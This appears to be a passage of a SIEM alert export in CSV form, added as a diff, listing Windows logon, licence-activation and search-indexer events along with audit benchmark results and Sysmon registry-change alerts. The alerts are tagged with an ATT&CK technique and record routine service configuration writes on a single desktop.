+ Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:32.661",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable""" +"Apr 24, 2020 @ 12:33:32.612",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 24, 2020 @ 12:33:32.478",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 12:33:28.412",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x717AF + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 12:33:28.395",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x717D3 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 12:33:28.372",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x717D3 + Linked Logon ID: 0x717AF + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:28.358",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x717AF + Linked Logon ID: 0x717D3 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:27.214",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 12:33:24.951",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 12:33:24.930",3,"The database engine attached a database",,"""SearchIndexer (4708,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00BE:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000003 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.034318 -0.034121 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.020935 -0.016045 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:46, WS:136K # 0K, PF:200K # 0K, P:200K) +[4] 0.000096 +J(0) +[5] - +[6] - +[7] - +[8] 0.002524 -0.000853 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:55, WS:216K # 0K, PF:664K # 0K, P:664K) +[9] 0.033642 -0.000187 (5) CM -0.033181 (3) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:68, WS:272K # 0K, PF:256K # 188K, P:256K) +[10] 0.000214 -0.000118 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 28K, PF:96K # 96K, P:96K) +[11] 0.000012 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000032 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000003 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 12:33:24.850",3,"The database engine is starting a new instance",,"""SearchIndexer (4708,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 12:33:24.775",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 12:33:22.398",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 12:33:20.155",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.855768500Z"",""eventRecordID"":""617"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.836\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.836"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.836 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.855",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.650980300Z"",""eventRecordID"":""611"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.842",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.650491500Z"",""eventRecordID"":""610"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3f376\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3f376\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3f376\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 12:33:19.833",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.649568700Z"",""eventRecordID"":""609"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.812",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.649350200Z"",""eventRecordID"":""608"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.794",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.647326400Z"",""eventRecordID"":""607"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3f376\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.755",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.646998800Z"",""eventRecordID"":""606"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.715",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.643779300Z"",""eventRecordID"":""605"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 24, 2020 @ 12:33:19.698",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.641786800Z"",""eventRecordID"":""604"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3f376\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3f376\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3f376\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 12:33:19.687",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T12:33:14.640512700Z"",""eventRecordID"":""603"",""processID"":""2164"",""threadID"":""3208"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 12:33:14.586\r\nProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3f376\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 12:33:14.586"",""processGuid"":""{df9fc3d3-dc81-5ea2-0000-00107ca80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3f376\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 12:33:14.586 +ProcessGuid: {df9fc3d3-dc81-5ea2-0000-00107ca80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3f376\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 12:33:19.663",9,"ATT&CK T1058:Registry edit for new 